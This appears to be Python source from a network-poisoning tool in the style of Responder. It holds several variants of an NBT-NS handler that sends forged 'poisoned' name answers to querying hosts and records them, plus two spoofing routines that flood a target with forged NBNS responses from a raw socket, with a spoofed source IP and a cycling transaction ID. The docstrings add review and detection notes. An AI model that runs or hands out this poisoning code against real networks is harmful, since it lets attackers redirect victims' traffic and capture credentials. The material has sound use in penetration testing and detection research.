def handle(self):
    """Process one NBT-NS datagram received on the name-service socket.

    The queried name is decoded from bytes 13..44 of the datagram.
    Nothing further happens unless ``RespondToThisHost`` returns exactly
    ``True`` for this client/name pair and bytes 2..3 of the datagram are
    0x01 0x10 (the NBNS flags of a broadcast name query with recursion
    desired).

    In analyze mode the request is only printed. Otherwise an ``NBT_Ans``
    built from the request is sent back to the client and the event is
    printed.

    NOTE(review): the fingerprint call runs before the analyze-mode check,
    so with ``Finger_On_Off`` set the client is still contacted on port 445
    in analyze mode -- presumably an SMB connection; confirm in
    ``fingerprint.RunSmbFinger``. Analyze mode is therefore not silent on
    the wire in that configuration.
    """
    payload, sock = self.request
    client_ip = self.client_address[0]
    queried_name = Decode_Name(payload[13:45])

    # Scope filter: anything other than an explicit True means "ignore".
    if RespondToThisHost(client_ip, queried_name) is not True:
        return None

    # Only datagrams carrying these two flag bytes are acted on.
    if payload[2:4] != "\x01\x10":
        return None

    finger_info = None
    if settings.Config.Finger_On_Off:
        finger_info = fingerprint.RunSmbFinger((client_ip, 445))

    if settings.Config.AnalyzeMode:
        # Observe only: report the query, send nothing back.
        banner = "[Analyze mode: NBT-NS]"
        report = "%s Request by %s for %s, ignoring" % (
            banner, client_ip, queried_name)
        print(color(report, 2, 1))
    else:
        # Answer the query, then report what was sent.
        answer = NBT_Ans()
        answer.calculate(payload)
        sock.sendto(str(answer), self.client_address)
        banner = "[*] [NBT-NS]"
        report = "%s Poisoned answer sent to %s for name %s (service: %s)" % (
            banner, client_ip, queried_name, NBT_NS_Role(payload[43:46]))
        print(color(report, 2, 1))

    if finger_info is not None:
        print(text("[FINGER] OS Version : %s" % color(finger_info[0], 3)))
        print(text("[FINGER] Client Version : %s" % color(finger_info[1], 3)))
def handle(self):
    """Process one NBT-NS datagram and record the outcome.

    The queried name comes from bytes 13..44 of the datagram. The handler
    stops early unless ``RespondToThisHost`` returns exactly ``True`` and
    bytes 2..3 are 0x01 0x10 (the NBNS flags of a broadcast name query
    with recursion desired).

    Both branches print a line and store a record through
    ``SavePoisonersToDb``; the ``'AnalyzeMode'`` value is ``'1'`` when the
    query was only observed and ``'0'`` when an ``NBT_Ans`` reply was sent.
    These records are what to review when reconstructing which hosts and
    names were involved.

    NOTE(review): ``fingerprint.RunSmbFinger`` is called before the
    analyze-mode check, so with ``Finger_On_Off`` set the client is
    contacted on port 445 even when no answer is sent -- confirm what that
    helper puts on the wire.
    """
    request_data, reply_sock = self.request
    peer_ip = self.client_address[0]
    name = Decode_Name(request_data[13:45])

    # Scope filter: only an explicit True lets the request through.
    if RespondToThisHost(peer_ip, name) is not True:
        return None

    if request_data[2:4] != "\x01\x10":
        return None

    os_info = None
    if settings.Config.Finger_On_Off:
        os_info = fingerprint.RunSmbFinger((peer_ip, 445))

    if settings.Config.AnalyzeMode:
        # Observe only: nothing is sent back to the client.
        header = "[Analyze mode: NBT-NS]"
        line = "%s Request by %s for %s, ignoring" % (header, peer_ip, name)
        print(color(line, 2, 1))
        record = {
            'Poisoner': 'NBT-NS',
            'SentToIp': peer_ip,
            'ForName': name,
            'AnalyzeMode': '1',
        }
        SavePoisonersToDb(record)
    else:
        reply = NBT_Ans()
        reply.calculate(request_data)
        reply_sock.sendto(str(reply), self.client_address)
        header = "[*] [NBT-NS]"
        service = NBT_NS_Role(request_data[43:46])
        line = "%s Poisoned answer sent to %s for name %s (service: %s)" % (
            header, peer_ip, name, service)
        print(color(line, 2, 1))
        record = {
            'Poisoner': 'NBT-NS',
            'SentToIp': peer_ip,
            'ForName': name,
            'AnalyzeMode': '0',
        }
        SavePoisonersToDb(record)

    if os_info is not None:
        print(text("[FINGER] OS Version : %s" % color(os_info[0], 3)))
        print(text("[FINGER] Client Version : %s" % color(os_info[1], 3)))
def startSpoofing(self):
    """Send a continuous stream of forged NBNS name responses.

    ``settings.Config.spoof`` is read as ``target:source:name``. An
    ``NBT_Ans`` answer mapping the upper-cased name to
    ``settings.Config.Bind_To`` is wrapped in an IP/UDP packet (source
    address taken from the setting, ports 137 -> 137) and written to a raw
    socket in an endless loop. The function returns only when the setting
    cannot be parsed.

    Detection notes, derived from the constants below: every datagram has
    a zeroed UDP checksum, a TTL field of 0x0000FFFF in the answer, a
    transaction ID that changes on each packet, and no preceding query
    from the receiver.
    """
    try:
        target_ip, source_ip, name = settings.Config.spoof.split(":")
        if target_ip is None or name is None:
            return
    except:
        # Any parsing problem: report the raw setting and give up.
        print("ERROR" + settings.Config.spoof)
        return

    name = name.upper()

    # First-level NetBIOS encoding: each byte becomes two letters, one per
    # nibble, offset from 'A'.
    encoded_parts = []
    for ch in name:
        code = ord(ch)
        encoded_parts.append(
            chr((code >> 4) + ord('A')) + chr((code & 0xF) + ord('A')))
    encoded_name = ''.join(encoded_parts)

    # "CA" is an encoded space (0x20); "AA" is an encoded 0x00 suffix byte.
    padding = "CA" * (15 - len(name)) + 'AA' + '\x00'

    # The counter starts at 1000, so the first progress line appears after
    # 9001 sends and later ones after every 10001.
    sent = 1000

    answer = NBT_Ans()
    answer.fields["NbtName"] = '\x20' + encoded_name + padding
    answer.fields["IP"] = socket.inet_aton(settings.Config.Bind_To)
    answer.fields["TTL"] = "\x00\x00\xFF\xFF"
    answer.fields["Tid"] = "\xAA\xAA"

    # Raw IP socket: the IP header below is supplied by this code. Opening
    # one normally needs elevated privileges.
    raw_sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    headers = IP(src=source_ip, dst=target_ip) / UDP(sport=137, dport=137)
    frame = bytearray(str(headers / Raw(load=str(answer))))

    # Bytes 26-27: UDP checksum, assuming a 20-byte IP header -- set to zero.
    frame[26] = '\x00'
    frame[27] = '\x00'

    while True:
        for high in range(255):
            for low in range(255):
                # Bytes 28-29: start of the UDP payload, the transaction ID.
                frame[28] = chr(high)
                frame[29] = chr(low)
                raw_sock.sendto(frame, (target_ip, 137))
                sent += 1
                if sent > 10000:
                    sent = 0
                    banner = "[*] [NBTSpam]"
                    print(color(banner, 2, 1) + " 10000 NBNS replies sent to "
                          + target_ip + " for name " + name)
def handle(self):
    """Process one NBT-NS datagram (bytes-based variant).

    The queried name is decoded from bytes 13..44 after conversion through
    ``NetworkRecvBufferPython2or3``. The handler stops unless
    ``RespondToThisHost`` returns exactly ``True`` and bytes 2..3 are
    0x01 0x10 (the NBNS flags of a broadcast name query with recursion
    desired).

    Analyze mode prints and records the query without replying; otherwise
    an ``NBT_Ans`` built from the request is sent to the client. Either
    way a record goes to ``SavePoisonersToDb`` with ``'AnalyzeMode'`` set
    to ``'1'`` or ``'0'`` respectively. No fingerprinting call is made in
    this variant, so analyze mode sends nothing from this handler.
    """
    packet, sock = self.request
    client_ip = self.client_address[0]
    queried = Decode_Name(NetworkRecvBufferPython2or3(packet[13:45]))

    # Scope filter: only an explicit True lets the request through.
    if RespondToThisHost(client_ip, queried) is not True:
        return None

    if packet[2:4] != b'\x01\x10':
        return None

    if settings.Config.AnalyzeMode:
        # Observe only: log the query and record it.
        tag = "[Analyze mode: NBT-NS]"
        line = "%s Request by %s for %s, ignoring" % (tag, client_ip, queried)
        print(color(line, 2, 1))
        SavePoisonersToDb({
            'Poisoner': 'NBT-NS',
            'SentToIp': client_ip,
            'ForName': queried,
            'AnalyzeMode': '1',
        })
        return None

    # Answering mode: reply to the client, then log and record the event.
    reply = NBT_Ans()
    reply.calculate(packet)
    sock.sendto(NetworkSendBufferPython2or3(reply), self.client_address)
    tag = "[*] [NBT-NS]"
    service = NBT_NS_Role(NetworkRecvBufferPython2or3(packet[43:46]))
    line = "%s Poisoned answer sent to %s for name %s (service: %s)" % (
        tag, client_ip, queried, service)
    print(color(line, 2, 1))
    SavePoisonersToDb({
        'Poisoner': 'NBT-NS',
        'SentToIp': client_ip,
        'ForName': queried,
        'AnalyzeMode': '0',
    })
def startSpoofing(self):
    """Emit forged NBNS name responses in an endless loop.

    Parses ``settings.Config.spoof`` as ``target:source:name``, fills an
    ``NBT_Ans`` so that the upper-cased name resolves to
    ``settings.Config.Bind_To``, and writes the resulting IP/UDP packet
    (ports 137 -> 137, source address from the setting) to a raw socket
    repeatedly. It returns only if the setting cannot be parsed.

    Detection notes, derived from the constants below: zero UDP checksum,
    answer TTL field 0x0000FFFF, a per-packet changing transaction ID, and
    responses that no query from the receiver preceded.
    """

    def _nibble_letters(ch):
        # First-level NetBIOS encoding of one character: high nibble then
        # low nibble, each offset from 'A'.
        value = ord(ch)
        return chr((value >> 4) + ord('A')) + chr((value & 0xF) + ord('A'))

    try:
        dst_ip, src_ip, wanted = settings.Config.spoof.split(":")
        if dst_ip is None or wanted is None:
            return
    except:
        # Any parsing problem: report the raw setting and stop.
        print("ERROR" + settings.Config.spoof)
        return

    wanted = wanted.upper()
    encoded_name = ''.join([_nibble_letters(ch) for ch in wanted])
    # "CA" encodes a space (0x20); "AA" encodes the 0x00 suffix byte.
    padding = "CA" * (15 - len(wanted)) + 'AA' + '\x00'
    # Starts at 1000: the first progress line comes after 9001 sends, the
    # following ones after every 10001.
    counter = 1000

    response = NBT_Ans()
    response.fields["NbtName"] = '\x20' + encoded_name + padding
    response.fields["IP"] = socket.inet_aton(settings.Config.Bind_To)
    response.fields["TTL"] = "\x00\x00\xFF\xFF"
    response.fields["Tid"] = "\xAA\xAA"

    # Raw IP socket: the header is supplied by this code. Opening one
    # normally needs elevated privileges.
    sender = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    envelope = IP(src=src_ip, dst=dst_ip) / UDP(sport=137, dport=137)
    wire = bytearray(str(envelope / Raw(load=str(response))))

    # Bytes 26-27 hold the UDP checksum (assuming a 20-byte IP header).
    wire[26] = '\x00'
    wire[27] = '\x00'

    while True:
        for first in range(255):
            for second in range(255):
                # Bytes 28-29 open the UDP payload: the transaction ID.
                wire[28] = chr(first)
                wire[29] = chr(second)
                sender.sendto(wire, (dst_ip, 137))
                counter += 1
                if counter > 10000:
                    counter = 0
                    label = "[*] [NBTSpam]"
                    print(color(label, 2, 1) + " 10000 NBNS replies sent to "
                          + dst_ip + " for name " + wanted)